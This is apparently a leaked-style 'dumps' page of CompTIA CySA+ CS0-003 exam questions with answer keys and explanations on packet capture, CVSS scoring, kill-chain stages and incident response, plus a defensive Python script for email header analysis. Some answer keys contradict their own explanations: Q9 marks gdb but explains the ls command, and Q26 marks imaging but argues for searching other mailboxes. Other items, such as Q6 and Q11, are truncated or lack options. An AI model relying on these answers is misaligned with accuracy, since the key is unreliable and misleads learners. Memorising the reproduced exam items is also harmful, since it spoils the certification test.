CompTIA Cybersecurity Analyst (CySA+) CS0-003 Updated Dumps
1. A security analyst wants to capture large amounts of network data that will be analyzed at a
later time. The packet capture does not need to be in a format that is readable by humans,
since it will be put into a binary file called "packetCapture." The capture must be as efficient as
possible, and the analyst wants to minimize the likelihood that packets will be missed.
Which of the following commands will best accomplish the analyst's objectives?
A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture
Answer: A
Explanation:
The tcpdump command is a network packet analyzer tool that can capture and display network
traffic. The -w option specifies a file name to write the captured packets to, in a binary format
that can be read by tcpdump or other tools later. This option is useful for capturing large
amounts of network data that will be analyzed at a later time, as the question requires. The
packet capture does not need to be in a format that is readable by humans, since it will be put
into a binary file called “packetCapture”. The capture must be as efficient as possible, and the
-w option minimizes the processing and output overhead of tcpdump, reducing the likelihood
that packets will be missed.
2. A cybersecurity analyst notices unusual network scanning activity coming from a country that
the company does not do business with.
Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall
Answer: A
Explanation:
Geoblocking is the best mitigation technique for unusual network scanning activity coming from
a country that the company does not do business with, as it can prevent any potential attacks or
data breaches from that country. Geoblocking is the practice of restricting access to websites or
services based on geographic location, usually by blocking IP addresses associated with a
certain country or region. Geoblocking can help reduce the overall attack surface and protect
against malicious actors who may be trying to exploit vulnerabilities or steal information. The
other options are not as effective as geoblocking, as they may not block all the possible sources
of the scanning activity, or they may not address the root cause of the problem.
Official Reference: https://www.blumira.com/geoblocking/; https://www.avg.com/en/signal/geo-blocking
3. A security team identified several rogue Wi-Fi access points during the most recent network
scan.
The network scans occur once per quarter.
Which of the following controls would best allow the organization to identify rogue devices more
quickly?
A. Implement a continuous monitoring policy.
B. Implement a BYOD policy.
C. Implement a portable wireless scanning policy.
D. Change the frequency of network scans to once per month.
Answer: A
Explanation:
The best control to allow the organization to identify rogue devices more quickly is A. Implement
a continuous monitoring policy. A continuous monitoring policy is a set of procedures and tools
that enable an organization to detect and respond to unauthorized or anomalous activities on its
network in real time or near real time. A continuous monitoring policy can help identify rogue
access points as soon as they appear on the network, rather than waiting for quarterly or
monthly scans. A continuous monitoring policy can also help improve the overall security
posture and compliance of the organization by providing timely and accurate information about
its network assets, vulnerabilities, threats, and incidents.
4. SIMULATION
A healthcare organization must develop an action plan based on the findings from a risk
assessment.
The action plan must consist of:
- Risk categorization
- Risk prioritization
- Implementation of controls
INSTRUCTIONS
Click on the audit report, risk matrix, and SLA expectations documents to review their contents.
On the Risk categorization tab, determine the order in which the findings must be prioritized for
remediation according to the risk rating score. Then, assign a categorization to each risk.
On the Controls tab, select the appropriate control(s) to implement for each risk finding.
Findings may have more than one control implemented. Some controls may be used more than
once or not at all.
If at any time you would like to bring back the initial state of the simulation, please click the
Reset All button.
Answer:
5. A security analyst has prepared a vulnerability scan that contains all of the company's
functional subnets. During the initial scan, users reported that network printers began to print
pages that contained unreadable text and icons.
Which of the following should the analyst do to ensure this behavior does not occur during
subsequent vulnerability scans?
A. Perform non-credentialed scans.
B. Ignore embedded web server ports.
C. Create a tailored scan for the printer subnet.
D. Increase the threshold length of the scan timeout.
Answer: C
Explanation:
The best way to prevent network printers from printing pages during a vulnerability scan is to
create a tailored scan for the printer subnet that excludes the ports and services that trigger the
printing behavior. The other options are not effective for this purpose: performing non-credentialed
scans may not reduce the impact on the printers; ignoring embedded web server
ports may not cover all the possible ports that cause printing; increasing the threshold length of
the scan timeout may not prevent the printing from occurring.
Reference: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, one
of the objectives for the exam is to “use appropriate tools and methods to manage, prioritize
and respond to attacks and vulnerabilities”. The book also covers the usage and syntax of
vulnerability scanning tools, such as Nessus, Nmap, and Qualys, in chapter 4. Specifically, it
explains the meaning and function of each component in vulnerability scanning, such as
credentialed vs. non-credentialed scans, port scanning, and scan scheduling, pages 149-160.
It also discusses the common issues and challenges of vulnerability scanning, such as network
disruptions, false positives, and scan scope, pages 161-162. Therefore, this is a reliable
source to verify the answer to the question.
6. SIMULATION
An organization's website was maliciously altered.
INSTRUCTIONS
Review information in each tab to select the source IP the analyst should be concerned about,
the indicator of compromise, and the two appropriate corrective actions.
Answer:
Step 1: Analyzing the SFTP Log
The SFTP log provides a record of file transfer and login activities:
User “sjames” logged in from several IP addresses:
7. While observing several host machines, a security analyst notices a program is overwriting
data to a buffer.
Which of the following controls will best mitigate this issue?
A. Data execution prevention
B. Output encoding
C. Prepared statements
D. Parameterized queries
Answer: A
Explanation:
Data execution prevention (DEP) is a security feature that prevents code from being executed in
memory regions that are marked as data-only. This helps mitigate buffer overflow attacks, which
are a type of attack where a program overwrites data to a buffer beyond its allocated size,
potentially allowing malicious code to be executed. DEP can be implemented at the hardware or
software level and can prevent unauthorized code execution in memory buffers.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 10; https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention
8. A company is deploying new vulnerability scanning software to assess its systems. The
current network is highly segmented, and the networking team wants to minimize the number of
unique firewall rules.
Which of the following scanning techniques would be most efficient to achieve the objective?
A. Deploy agents on all systems to perform the scans.
B. Deploy a central scanner and perform non-credentialed scans.
C. Deploy a cloud-based scanner and perform a network scan.
D. Deploy a scanner sensor on every segment and perform credentialed scans.
Answer: A
9. Which of the following commands should the administrator run next to further analyze the
compromised system?
A. gdb /proc/1301
B. rpm -V openssh-server
C. /bin/ls -l /proc/1301/exe
D. kill -9 1301
Answer: A
Explanation:
/bin/ls -l /proc/1301/exe is the command that will show the absolute path to the executed binary
file associated with the process ID 1301, which is /usr/sbin/sshd. This information can help the
security analyst determine if the binary is an official version and has not been modified, which
could be an indicator of a compromise. /proc/1301/exe is a special symbolic link that points to
the executable file that was used to start the process 1301.
Reference: https://unix.stackexchange.com/questions/197854/how-does-the-proc-pid-exe-symlink-differ-from-ordinary-symlinks
10. A SOC manager receives a phone call from an upset customer. The customer received a
vulnerability report two hours ago, but the report did not have a follow-up remediation response
from an analyst.
Which of the following documents should the SOC manager review to ensure the team is
meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Answer: A
Explanation:
SLA stands for service level agreement, which is a contract or document that defines the
expectations and obligations between a service provider and a customer regarding the quality,
availability, performance, or scope of a service. An SLA may also specify the metrics, penalties,
or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can
help the SOC manager review if the team is meeting the appropriate contractual obligations for
the customer, such as response time, resolution time, reporting frequency, or communication
channels.
11. How many employees clicked on the link in the phishing email?
12. An incident response team is working with law enforcement to investigate an active web
server compromise. The decision has been made to keep the server running and to implement
compensating controls for a period of time. The web service must be accessible from the
internet via the reverse proxy and must connect to a database server.
Which of the following compensating controls will help contain the adversary while meeting the
other requirements? (Select two).
A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary's capabilities.
C. Stop the httpd service on the web server so that the adversary cannot use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.
Answer: BD
Explanation:
Deploying EDR on the web server and the database server to reduce the adversary's
capabilities and using microsegmentation to restrict connectivity to/from the web and database
servers are two compensating controls that will help contain the adversary while meeting the
other requirements. A compensating control is a security measure that is implemented to
mitigate the risk of a vulnerability or an attack when the primary control is not feasible or
effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors
endpoints for malicious activity and provides automated or manual response capabilities. EDR
can help contain the adversary by detecting and blocking their actions, such as data exfiltration,
lateral movement, privilege escalation, or command execution. Microsegmentation is a
technique that divides a network into smaller segments based on policies and rules, and applies
granular access controls to each segment. Microsegmentation can help contain the adversary
by isolating the web and database servers from other parts of the network, and limiting the
traffic that can flow between them.
Official Reference: https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives; https://www.comptia.org/certifications/cybersecurity-analyst; https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
13. A risk assessment concludes that the perimeter network has the highest potential for
compromise by an attacker, and it is labeled as a critical risk environment.
Which of the following is a valid compensating control to reduce the volume of valuable
information in the perimeter network that an attacker could gain using active reconnaissance
techniques?
A. A control that demonstrates that all systems authenticate using the approved authentication
method
B. A control that demonstrates that access to a system is only allowed by using SSH
C. A control that demonstrates that firewall rules are peer reviewed for accuracy and approved
before deployment
D. A control that demonstrates that the network security policy is reviewed and updated yearly
Answer: C
Explanation:
A valid compensating control to reduce the volume of valuable information in the perimeter
network that an attacker could gain using active reconnaissance techniques is a control that
demonstrates that firewall rules are peer reviewed for accuracy and approved before
deployment. This control can help ensure that the firewall rules are configured correctly and
securely, and that they do not allow unnecessary or unauthorized access to the perimeter
network. The other options are not compensating controls or do not address the risk of active
reconnaissance.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 14; https://www.isaca.org/resources/isaca-journal/issues/2016/volume-3/compensating-controls
14. A security analyst needs to ensure that systems across the organization are protected
based on the sensitivity of the content each system hosts. The analyst is working with the
respective system owners to help determine the best methodology that seeks to promote
confidentiality, availability, and integrity of the data being hosted.
Which of the following should the security analyst perform first to categorize and prioritize the
respective systems?
A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.
Answer: D
Explanation:
Determining the asset value of each system is the best action to perform first, as it helps to
categorize and prioritize the systems based on the sensitivity of the data they host. The asset
value is a measure of how important a system is to the organization, in terms of its financial,
operational, or reputational impact. The asset value can help the security analyst to assign a
risk level and a protection level to each system, and to allocate resources accordingly. The
other actions are not as effective as determining the asset value, as they do not directly address
the goal of promoting confidentiality, availability, and integrity of the data. Interviewing the users
who access these systems may provide some insight into how the systems are used and what
data they contain, but it may not reflect the actual value or sensitivity of the data from an
organizational perspective. Scanning the systems to see which vulnerabilities currently exist
may help to identify and remediate some security issues, but it does not help to categorize or
prioritize the systems based on their data sensitivity. Configuring alerts for vendor-specific zero-
day exploits may help to detect and respond to some emerging threats, but it does not help to
protect the systems based on their data sensitivity.
15. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a
previously remediated vulnerability has reappeared on a database server.
Which of the following is the most likely cause?
A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.
Answer: B
Explanation:
A rollback had been executed on the instance. If a database server is restored to a previous
state, it may reintroduce a vulnerability that was previously fixed. This can happen due to
backup and recovery operations, configuration changes, or software updates. A rollback can
undo the patching or mitigation actions that were applied to remediate the vulnerability.
Reference: Vulnerability Remediation: It’s Not Just Patching, Section: The Remediation
Process; Vulnerability assessment for SQL Server, Section: Remediation
16. A disgruntled open-source developer has decided to sabotage a code repository with a logic
bomb that will act as a wiper.
Which of the following parts of the Cyber Kill Chain does this act exhibit?
A. Reconnaissance
B. Weaponization
C. Exploitation
D. Installation
Answer: B
Explanation:
Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a
malicious payload to use against a target. In this case, the disgruntled open-source developer
has created a logic bomb that will act as a wiper, which is a type of malware that destroys data
on a system. This is an example of weaponization, as the developer has prepared a
cyberweapon to sabotage the code repository.
Reference: The answer was based on the web search results from Bing, especially the following
sources:
Cyber Kill Chain® | Lockheed Martin, which states: “In the weaponization step, the adversary
creates remote access malware weapon, such as a virus or worm, tailored to one or more
vulnerabilities.” The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which
states: “In the weaponization stage, all of the attacker’s preparatory work culminates in the
creation of malware to be used against an identified target.”
What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states: “Weaponization:
The attacker creates a malicious payload that will be delivered to the target.”
18. A Chief Information Officer wants to implement a BYOD strategy for all company laptops
and mobile phones. The Chief Information Security Officer is concerned with ensuring all
devices are patched and running some sort of protection against malicious software.
Which of the following existing technical controls should a security analyst recommend to best
meet all the requirements?
A. EDR
B. Port security
C. NAC
D. Segmentation
Answer: A
Explanation:
EDR stands for endpoint detection and response, which is a type of security solution that
monitors and protects all devices that are connected to a network, such as laptops and mobile
phones. EDR can help to ensure that all devices are patched and running some sort of
protection against malicious software by providing continuous visibility, threat detection, incident
response, and remediation capabilities. EDR can also help to enforce security policies and
compliance requirements across all devices.
Reference: https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/
19. During a cybersecurity incident, one of the web servers at the perimeter network was
affected by ransomware.
Which of the following actions should be performed immediately?
A. Shut down the server.
B. Reimage the server
C. Quarantine the server
D. Update the OS to latest version.
Answer: C
Explanation:
Quarantining the server is the best action to perform immediately, as it isolates the affected
server from the rest of the network and prevents the ransomware from spreading to other
systems or data.
Quarantining the server also preserves the evidence of the ransomware attack, which can be
useful for forensic analysis and law enforcement investigation. The other actions are not as
urgent as quarantining the server, as they may not stop the ransomware infection, or they may
destroy valuable evidence. Shutting down the server may not remove the ransomware, and it
may trigger a data deletion mechanism by the ransomware. Reimaging the server may restore
its functionality, but it will also erase any traces of the ransomware and make recovery of
encrypted data impossible. Updating the OS to the latest version may fix some vulnerabilities,
but it will not remove the ransomware or decrypt the data.
Official Reference: https://www.cisa.gov/stopransomware/ransomware-guide; https://www.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf; https://www.cisa.gov/stopransomware/ive-been-hit-ransomware
20. An analyst discovers unusual outbound connections to an IP that was previously blocked at
the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall
rules that were in place were removed by a service account that is not recognized.
Which of the following parts of the Cyber Kill Chain does this describe?
A. Delivery
B. Command and control
C. Reconnaissance
D. Weaponization
Answer: B
Explanation:
The Command and Control stage of the Cyber Kill Chain describes the communication between
the attacker and the compromised system. The attacker may use this channel to send
commands, receive data, or update malware. If the analyst discovers unusual outbound
connections to an IP that was previously blocked, it may indicate that the attacker has
established a command and control channel and bypassed the security controls.
Reference: Cyber Kill Chain® | Lockheed Martin
21. A security team is concerned about recent Layer 4 DDoS attacks against the company
website.
Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules.
B. Deploy an IPS in the perimeter network.
C. Roll out a CDN.
D. Implement a load balancer.
Answer: C
Explanation:
Rolling out a CDN is the best control to mitigate the Layer 4 DDoS attacks against the company
website. A CDN is a Content Delivery Network, which is a system of distributed servers that
deliver web content to users based on their geographic location, the origin of the web page, and
the content delivery server. A CDN can help protect against Layer 4 DDoS attacks, which are
volumetric attacks that aim to exhaust the network bandwidth or resources of the target website
by sending a large amount of traffic, such as SYN floods, UDP floods, or ICMP floods. A CDN
can mitigate these attacks by distributing the traffic across multiple servers, caching the web
content closer to the users, filtering out malicious or unwanted traffic, and providing scalability
and redundancy for the website.
Reference: How to Stop a DDoS Attack: Mitigation Steps for Each OSI Layer, Application layer
DDoS attack | Cloudflare
23. A security analyst is working on a server patch management policy that will allow the
infrastructure team to be informed more quickly about new patches.
Which of the following would most likely be required by the infrastructure team so that
vulnerabilities can be remediated quickly? (Select two).
A. Hostname
B. Missing KPI
C. CVE details
D. POC availability
E. IoCs
F. npm identifier
Answer: CE
Explanation:
CVE details and IoCs are information that would most likely be required by the infrastructure
team so that vulnerabilities can be remediated quickly. CVE details provide the description,
severity, impact, and solution of the vulnerabilities that affect the servers. IoCs are indicators of
compromise that help identify and respond to potential threats or attacks on the servers.
Reference: Server and Workstation Patch Management Policy, Section: Policy; Patch Management
Policy: Why You Need One in 2024, Section: What is a patch management policy?
24. An end-of-life date was announced for a widely used OS. A business-critical function is
performed by some machinery that is controlled by a PC, which is utilizing the OS that is
approaching the end-of-life date.
Which of the following best describes a security analyst's concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery
D. There are no compensating controls in place for the OS.
Answer: A
Explanation:
A security analyst’s concern is that any discovered vulnerabilities in the OS that is approaching
the end-of-life date will not be remediated by the vendor, leaving the system exposed to
potential attacks. The other options are not directly related to the security analyst’s role or
responsibility.
Verified Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives, page 9,
section 2.21
25. Which of the following should the analyst recommend be updated first to meet the security
requirements and reduce risks?
A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01
Answer: D
Explanation:
This VM has a public IP and an open port 80, which violates the company’s security
requirements of no public IPs and no insecure ports/protocols. It also exposes the VM to
potential attacks from the internet. This VM should be updated first to use a private IP and close
the port 80, or use a secure protocol such as HTTPS.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 2: Cloud and Hybrid
Environments, page 67; What is a Public IP Address?; What is Port 80?
26. A security analyst discovers an ongoing ransomware attack while investigating a phishing
email. The analyst downloads a copy of the file from the email and isolates the affected
workstation from the network.
Which of the following activities should the analyst perform next?
A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.
Answer: C
Explanation:
Searching for other mail users who have received the same file is the best activity to perform
next, as it helps to identify and contain the scope of the ransomware attack and prevent further
damage. Ransomware is a type of malware that encrypts files on a system and demands
payment for their decryption. Ransomware can spread through phishing emails that contain
malicious attachments or links that download the ransomware. By searching for other mail users
who have received the
same file, the analyst can alert them not to open it, delete it from their inboxes, and scan their
systems for any signs of infection. The other activities are not as urgent or effective as
searching for other mail users who have received the same file, as they do not address the
immediate threat of ransomware spreading or affecting more systems. Wiping the computer and
reinstalling software may restore the functionality of the affected workstation, but it will also
erase any evidence of the ransomware attack and make recovery of encrypted files impossible.
Shutting down the email server and quarantining it from the network may stop the delivery of
more phishing emails, but it will also disrupt normal communication and operations for the
organization. Acquiring a bit-level image of the affected workstation may preserve the evidence
of the ransomware attack, but it will not help to stop or remove the ransomware or decrypt the
files.
27. Which of the following stakeholders are most likely to receive a vulnerability scan report?
(Select two).
A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems administration
Answer: EF
Explanation:
The stakeholders most likely to receive a vulnerability scan report are:
The product owner needs to understand the security posture of the product to make informed
decisions about risk management, mitigation strategies, and prioritizing development resources.
Systems administrators are responsible for maintaining and securing systems. They need the
details from vulnerability scan reports to patch and remediate identified vulnerabilities in the
systems they manage.
28. The Chief Information Security Officer for an organization recently received approval to
install a new EDR solution. Following the installation, the number of alerts that require
remediation by an analyst has tripled.
Which of the following should the organization utilize to best centralize the workload for the
internal security team? (Select two).
A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP
Answer: AB
Explanation:
SOAR (Security Orchestration, Automation and Response) and SIEM (Security Information and
Event Management) are solutions that can help centralize the workload for the internal security
team by collecting, correlating, and analyzing alerts from different sources, such as EDR. SOAR
can also automate and streamline incident response workflows, while SIEM can provide
dashboards and reports for security monitoring and compliance.
Reference: What is EDR? Endpoint Detection & Response; How Does the Cyber Kill Chain
Protect Against Attacks?; What is EDR Solution?, EDR solutions secure diverse endpoints
through central monitoring
29. A managed security service provider is having difficulty retaining talent due to an increasing
workload caused by a client doubling the number of devices connected to the network.
Which of the following would best aid in decreasing the workload without increasing staff?
A. SIEM
B. XDR
C. SOAR
D. EDR
Answer: C
Explanation:
SOAR stands for Security Orchestration, Automation and Response, which is a set of features
that can help security teams manage, prioritize and respond to security incidents more
efficiently and effectively. SOAR can help decrease the workload without increasing staff by
automating repetitive tasks, streamlining workflows, integrating different tools and platforms,
and providing actionable insights and recommendations. SOAR is also one of the current trends
that CompTIA CySA+ covers in its exam objectives.
Official Reference: https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered; https://www.comptia.org/certifications/cybersecurity-analyst; https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
30. How many employees clicked on the link in the phishing email?
According to the email server logs, 25 employees clicked on the link in the phishing email.
31. A security analyst needs to mitigate a known, exploited vulnerability related to an attack
vector that embeds software through the USB interface.
Which of the following should the analyst do first?
A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company
asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.
Answer: C
Explanation:
USB ports are a common attack vector that can be used to deliver malware, steal data, or
compromise systems. The first step to mitigate this vulnerability is to check the configurations of
the company assets and disable or restrict the USB ports if possible. This will prevent
unauthorized devices from being connected and reduce the attack surface. The other options
are also important, but they are not the first priority in this scenario.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, page 247
What are Attack Vectors: Definition & Vulnerabilities, section “How to secure attack vectors”
Are there any attack vectors for a printer connected through USB in a Windows environment?,
answer by user “schroeder”
32. A security analyst reviews the latest vulnerability scans and observes there are
vulnerabilities with similar CVSSv3 scores but different base score metrics.
Which of the following attack vectors should the analyst remediate first?
A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Answer: C
Explanation:
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H is the vulnerability the analyst should
remediate first, as it has the highest CVSSv3 base score of the four options, 8.8. CVSSv3
(Common Vulnerability Scoring System version 3) is a standard framework for rating the severity
of vulnerabilities, based on metrics that reflect the characteristics and impact of the
vulnerability. The CVSSv3 score is calculated from three groups of metrics: Base, Temporal, and
Environmental. The Base metrics are mandatory and reflect the intrinsic qualities of the
vulnerability, such as how it can be exploited, what privileges are required, and what impact it
has on confidentiality, integrity, and availability. The Temporal metrics are optional and reflect
the current state of the vulnerability, such as whether there is a known exploit, a patch, or a
workaround. The Environmental metrics are also optional and reflect the context of the
vulnerability in a specific environment, such as the asset value, security requirements, or
mitigating controls. The Base metrics produce a score from 0 to 10, which can then be modified
by the Temporal and Environmental metrics. A CVSS score is also represented as a vector string,
a compressed textual representation of the values used to derive the score.
The four options share every metric except Attack Vector, so the ranking is decided by AV alone:
Network (N) scores higher than Adjacent (A), which scores higher than Local (L), which scores
higher than Physical (P).
The vector in option C has the following Base metrics:
Attack Vector (AV): Network (N). The vulnerability can be exploited remotely over a network
connection.
Attack Complexity (AC): Low (L). The attack does not require any special conditions or changes
to the configuration of the target system.
Privileges Required (PR): Low (L). The attacker needs some privileges on the target system,
such as user-level access.
User Interaction (UI): None (N). The attack does not require any user action to succeed.
Scope (S): Unchanged (U). The impact is confined to the same security authority as the
vulnerable component, such as an application or an operating system.
Confidentiality Impact (C): High (H). Total loss of confidentiality, such as unauthorized
disclosure of all data on the system.
Integrity Impact (I): High (H). Total loss of integrity, such as unauthorized modification or
deletion of all data on the system.
Availability Impact (A): High (H). Total loss of availability, such as denial of service or a
system crash.
With Scope Unchanged, the Base score is calculated as:
Base Score = Roundup(Minimum[(Impact + Exploitability), 10])
Where:
Impact = 6.42 x [1 - ((1 - Confidentiality) x (1 - Integrity) x (1 - Availability))]
Exploitability = 8.22 x Attack Vector x Attack Complexity x Privileges Required x User
Interaction
and Roundup rounds up to one decimal place. Using the specification's metric weights
(AV:N = 0.85, AC:L = 0.77, PR:L = 0.62, UI:N = 0.85, High impact = 0.56):
Impact = 6.42 x [1 - ((1 - 0.56) x (1 - 0.56) x (1 - 0.56))] = 6.42 x 0.9148 = 5.873
Exploitability = 8.22 x 0.85 x 0.77 x 0.62 x 0.85 = 2.835
Base Score = Roundup(Minimum[(5.873 + 2.835), 10]) = Roundup(8.708) = 8.8
Note that rounding the intermediate values to 5.9 and 2.8 first would give 8.7, which is already
at one decimal place and would therefore produce an incorrect Base score of 8.7; the
specification rounds only once, at the end.
Therefore, this vector has a Base score of 8.8, higher than any other option.
The other vectors differ only in the Attack Vector weight (AV:A = 0.62, AV:L = 0.55,
AV:P = 0.20), which gives them lower Base scores:
CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 6.6, as Physical (P) means
the vulnerability can only be exploited by having physical access to the target system.
CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 8.0, as Adjacent Network (A)
means the vulnerability can only be exploited from the same physical or logical network segment
as the target system.
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H has a Base score of 7.8, as Local (L) means the
vulnerability can only be exploited with local access to the target system, such as through a
terminal or a command shell.
33. During an incident involving phishing, a security analyst needs to find the source of the
malicious email.
Which of the following techniques would provide the analyst with this information?
A. Header analysis
B. Packet capture
C. SSL inspection
D. Reverse engineering
Answer: A
Explanation:
Header analysis is the technique of examining the metadata of an email, such as the sender,
recipient, date, subject, and routing information. It can help to identify the source of a malicious
email by revealing the IP address and domain name of the originator, as well as any spoofing or
redirection attempts.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 240;
CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 6, page 249.
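As an added example (not from the original page), the following Python walks the Received chain of a message the way an analyst does by hand: hops are stacked newest-first, so the originating host is the last Received line, and only the lines written by your own relays can be trusted. The message, host names and addresses are constructed for the example (documentation IP ranges and the .invalid TLD), and the trusted-relay list is an assumption.

```python
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed sample (not from the original page): a phishing message as received by the
# corporate mailbox, with three Received hops stacked outermost-first, as MTAs write them.
SAMPLE_RAW = """\
Return-Path: <billing@mail-example.invalid>
Received: from mx-in.corp.example (mx-in.corp.example [192.0.2.10])
\tby mailbox.corp.example with ESMTP id 1; Mon, 01 Jan 2024 08:30:04 -0500
Received: from relay.mail-example.invalid (relay.mail-example.invalid [198.51.100.7])
\tby mx-in.corp.example with ESMTPS id 2; Mon, 01 Jan 2024 08:30:03 -0500
Received: from laptop-7 (unknown [203.0.113.45])
\tby relay.mail-example.invalid with ESMTPA id 3; Mon, 01 Jan 2024 08:30:01 -0500
Authentication-Results: mx-in.corp.example; spf=fail smtp.mailfrom=mail-example.invalid; dkim=none
From: "Accounts Payable" <ap@corp.example>
To: staff@corp.example
Subject: Invoice overdue
Message-ID: <20240101083001.1@mail-example.invalid>

Please open the attached invoice.
"""

# Assumed: relays we operate, whose Received lines we therefore trust.
TRUSTED_RELAYS = {"mailbox.corp.example", "mx-in.corp.example"}

HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[^\]]+)\]\))?"
    r"\s+by\s+(?P<by>\S+)", re.I)


def received_hops(raw):
    """Received hops oldest-first, each with helo, rdns, ip, by and the hop's timestamp."""
    msg = email.message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())      # unfold continuation lines
        m = HOP_RE.search(value)
        if not m:
            continue
        when = None
        if ";" in value:
            try:
                when = parsedate_to_datetime(value.rsplit(";", 1)[1].strip())
            except (TypeError, ValueError):
                when = None
        hops.append({**m.groupdict(), "when": when})
    return hops


def originating_ip(raw):
    """IP of the host that handed the message to the first MTA in the chain."""
    for hop in received_hops(raw):
        if hop["ip"]:
            return hop["ip"]
    return None


def header_indicators(raw):
    """Checks an analyst runs on a suspected phishing message; returns readable findings."""
    msg = email.message_from_string(raw)
    findings = []
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    rp_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    if from_domain and rp_domain and from_domain != rp_domain:
        findings.append("From domain %s differs from Return-Path domain %s" % (from_domain, rp_domain))
    auth = " ".join(msg.get_all("Authentication-Results", []))
    for verdict in re.findall(r"\b(spf|dkim|dmarc)=(fail|softfail|none|permerror)", auth, re.I):
        findings.append("Authentication-Results: %s=%s" % verdict)
    hops = received_hops(raw)
    for hop in hops:
        if hop["rdns"] and hop["rdns"].lower() == "unknown":
            findings.append("hop from %s (%s) has no reverse DNS" % (hop["helo"], hop["ip"]))
    for earlier, later in zip(hops, hops[1:]):
        if earlier["when"] and later["when"] and later["when"] < earlier["when"]:
            findings.append("timestamps go backwards between %s and %s" % (earlier["by"], later["by"]))
    # Anything below the hops our own relays wrote can be forged by the sender.
    untrusted = [h for h in hops if h["by"].lower() not in TRUSTED_RELAYS]
    if untrusted:
        findings.append("%d hop(s) recorded by servers outside our control; treat as claims, not facts" % len(untrusted))
    return findings


if __name__ == "__main__":
    print("origin:", originating_ip(SAMPLE_RAW))
    for f in header_indicators(SAMPLE_RAW):
        print("-", f)
```

The originating address comes out as 203.0.113.45, but the script also flags that the hop reporting it was written by the sender's own relay, which is the caveat to keep in mind: a sender can insert fake Received lines below the ones your MTA adds, so the first hop your own relay recorded (here 198.51.100.7) is the last address you can actually vouch for.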
34. An organization has established a formal change management process after experiencing
several critical system failures over the past year.
Which of the following are key factors that the change management process will include in order
to reduce the impact of system failures? (Select two).
A. Ensure users document the system recovery plan prior to deployment.
B. Perform a full system-level backup following the change.
C. Leverage an audit tool to identify changes that are being made.
D. Identify assets with dependence that could be impacted by the change.
E. Require diagrams to be completed for all critical systems.
F. Ensure that all assets are properly listed in the inventory management system.
Answer: DF
Explanation:
The key factors in the change management process that reduce the impact of system failures
are D and F:
D) Identify assets with dependence that could be impacted by the change: This is crucial in
change management because understanding the interdependencies among assets can help
anticipate and mitigate the potential cascading effects of a change. By identifying these
